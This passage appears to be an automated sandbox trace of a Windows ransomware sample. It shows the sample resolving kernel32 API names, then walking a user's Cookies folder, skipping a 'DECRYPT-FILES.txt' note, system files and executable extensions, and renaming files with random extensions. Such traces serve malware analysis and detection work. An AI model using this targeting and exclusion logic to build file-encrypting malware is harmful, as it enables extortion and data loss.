returned="CreateHardLinkTransactedW" [0181.559] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.559] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.559] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.559] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.559] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.559] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.559] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.559] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.559] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.559] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.559] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.560] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.560] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.560] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.560] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.560] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.560] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.560] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.560] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.560] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.560] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.560] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.560] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.560] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.560] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.560] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.560] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.560] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.560] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.560] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.561] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.561] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.561] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.561] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.561] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.561] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.561] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.561] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.561] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.561] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.561] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.562] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.562] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.562] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.562] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.562] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.562] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.562] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.562] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.562] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.562] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.562] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.562] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.563] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.563] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.563] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.563] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.563] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.563] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.563] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.563] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.563] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.563] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.563] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.563] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.563] lstrlenA (lpString="DELETEATOM") returned 10 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.563] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.563] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.563] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.563] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.563] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.563] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.564] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.564] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.564] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.564] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.564] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.564] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.564] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.564] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.564] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.564] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.564] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.564] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.564] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.564] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.564] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.564] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.564] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.564] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.565] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.565] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.565] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.565] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.565] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.565] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.565] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.565] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.565] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.565] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.565] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.565] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.565] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.565] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.565] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.565] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.565] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.565] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.566] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.566] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.566] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.566] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn") returned 117 [0181.566] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn.B3fnXQ") returned 124 [0181.566] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmon"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmOn.B3fnXQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adform[1].txt.qawmon.b3fnxq"), dwFlags=0x0) returned 1 [0181.567] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.567] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.567] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.567] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbe5d5130, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0x45f08810, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab5c0860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x34a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", cAlternateFileName="5P5NRG~1.ERB")) returned 1 [0181.567] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="DECRYPT-FILES.txt") returned -1 [0181.567] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="autorun.inf") returned -1 [0181.567] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="boot.ini") returned -1 [0181.567] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="desktop.ini") returned -1 [0181.567] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="ntuser.dat") returned -1 [0181.568] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="iconcache.db") returned -1 [0181.568] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="bootsect.bak") returned -1 [0181.568] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="ntuser.dat.log") returned -1 [0181.568] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="thumbs.db") returned -1 [0181.568] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN", lpString2="Bootfont.bin") returned -1 [0181.568] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN") returned 41 [0181.568] lstrcmpiW (lpString1="eRBU2tN", lpString2="lnk") returned -1 [0181.568] lstrcmpiW (lpString1="eRBU2tN", lpString2="exe") returned -1 [0181.568] lstrcmpiW (lpString1="eRBU2tN", lpString2="sys") returned -1 [0181.568] lstrcmpiW (lpString1="eRBU2tN", lpString2="dll") returned 1 [0181.568] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.568] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN") returned 41 [0181.568] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.568] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt.eRBU2tN") 